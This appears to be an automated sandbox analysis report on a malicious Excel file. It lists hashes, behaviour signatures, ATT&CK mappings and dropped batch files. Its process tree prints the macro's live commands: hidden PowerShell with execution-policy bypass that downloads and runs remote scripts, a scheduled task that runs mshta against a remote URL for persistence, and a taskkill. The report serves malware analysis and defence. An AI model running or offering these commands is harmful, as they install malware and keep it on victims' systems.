Analysis

  • max time kernel
    124s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-08-2022 07:46

General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.10970.xls

  • Size

    33KB

  • MD5

    e3ef4e5798aefd57925a449e0efda671

  • SHA1

    d3306b452daa516222c83ab4d50a31098e186ef2

  • SHA256

    c2283d9d0917f36abb730abb706f9e8d2b622034d8936e1577ac0f30995a40d0

  • SHA512

    3d03df6a81a948adcf284a776e52d93c04d6695f4be9f664b1a57f94fce5f86c205ded031c550be07fc60547d0275cc80c81cd0f13759fbc2e47e87808ca0848

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.10970.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4808
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4880
      • C:\Windows\system32\PING.EXE
        ping -n 80 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:4444
      • C:\Windows\system32\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3036
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1656
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4856
      • C:\Windows\system32\PING.EXE
        ping -n 85 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:4332
      • C:\Windows\system32\cmd.exe
        cmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2688
        • C:\Windows\system32\schtasks.exe
          schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
          4⤵
          • Creates scheduled task(s)
          PID:2548
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4812
      • C:\Windows\system32\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:2336
      • C:\Windows\system32\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:832
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3588
      • C:\Windows\system32\cmd.exe
        cmd /c start /min taskkill /f /im WINWORD.EXE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im WINWORD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1316
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4756
      • C:\Windows\system32\PING.EXE
        ping -n 7 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:3744

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    abc27673d9c940ad74b41c58391d2412

    SHA1

    9a31a521a521dcd0f974ce6f7a50aecc69a50df0

    SHA256

    cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

    SHA512

    c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    6KB

    MD5

    04581571c4d6428dec2bd256fee50cd4

    SHA1

    105b2220c1863d72713d29a5848e218f705307aa

    SHA256

    b380c2a65e0ee6da42ccfb229b144d515232de11f612b469fcc81443496d21c1

    SHA512

    af6ebe97cbb2cd92f4040fc8bf6f295a3fb202829964a9da7404b3f3bc7690d00d21dadae65e528780e56887a1b99271ae57bc538841f080bc94bfe929beba8a

  • C:\Users\Public\DefenderFile.bat
    Filesize

    1KB

    MD5

    ae4a0997ce01f4ebbb3f3cc0054ce933

    SHA1

    e5bfe3b390f1208b8b6ea0317f4364005f552851

    SHA256

    a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

    SHA512

    5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

  • C:\Users\Public\Outlook.bat
    Filesize

    900B

    MD5

    0427a3545c2eaed3167cffe2cf5f8aba

    SHA1

    b27f3a7d2b855f1d0b84727603add711bb6f6170

    SHA256

    ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

    SHA512

    fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

  • C:\Users\Public\task.bat
    Filesize

    954B

    MD5

    20a395a26f50352dc994664c3e7df533

    SHA1

    9b6407d22297b7af7c49aacd51bf42e51ced7029

    SHA256

    c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32

    SHA512

    2b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617

  • memory/832-148-0x0000000000000000-mapping.dmp
  • memory/1316-151-0x0000000000000000-mapping.dmp
  • memory/1656-162-0x00007FFF2F170000-0x00007FFF2FC31000-memory.dmp
    Filesize

    10.8MB

  • memory/1656-171-0x00007FFF2F170000-0x00007FFF2FC31000-memory.dmp
    Filesize

    10.8MB

  • memory/1656-158-0x0000000000000000-mapping.dmp
  • memory/1656-172-0x00007FFF2F170000-0x00007FFF2FC31000-memory.dmp
    Filesize

    10.8MB

  • memory/2336-145-0x0000000000000000-mapping.dmp
  • memory/2340-150-0x0000000000000000-mapping.dmp
  • memory/2548-165-0x0000000000000000-mapping.dmp
  • memory/2688-164-0x0000000000000000-mapping.dmp
  • memory/3036-157-0x0000000000000000-mapping.dmp
  • memory/3588-152-0x00000224C4740000-0x00000224C4762000-memory.dmp
    Filesize

    136KB

  • memory/3588-149-0x0000000000000000-mapping.dmp
  • memory/3588-153-0x00007FFF2F170000-0x00007FFF2FC31000-memory.dmp
    Filesize

    10.8MB

  • memory/3588-154-0x00007FFF2F170000-0x00007FFF2FC31000-memory.dmp
    Filesize

    10.8MB

  • memory/3588-155-0x00007FFF2F170000-0x00007FFF2FC31000-memory.dmp
    Filesize

    10.8MB

  • memory/3744-146-0x0000000000000000-mapping.dmp
  • memory/4332-143-0x0000000000000000-mapping.dmp
  • memory/4444-144-0x0000000000000000-mapping.dmp
  • memory/4756-142-0x0000000000000000-mapping.dmp
  • memory/4808-135-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4808-132-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4808-133-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4808-134-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4808-138-0x00007FFF15A20000-0x00007FFF15A30000-memory.dmp
    Filesize

    64KB

  • memory/4808-137-0x00007FFF15A20000-0x00007FFF15A30000-memory.dmp
    Filesize

    64KB

  • memory/4808-136-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4808-170-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4808-167-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4808-168-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4808-169-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4812-141-0x0000000000000000-mapping.dmp
  • memory/4856-140-0x0000000000000000-mapping.dmp
  • memory/4880-139-0x0000000000000000-mapping.dmp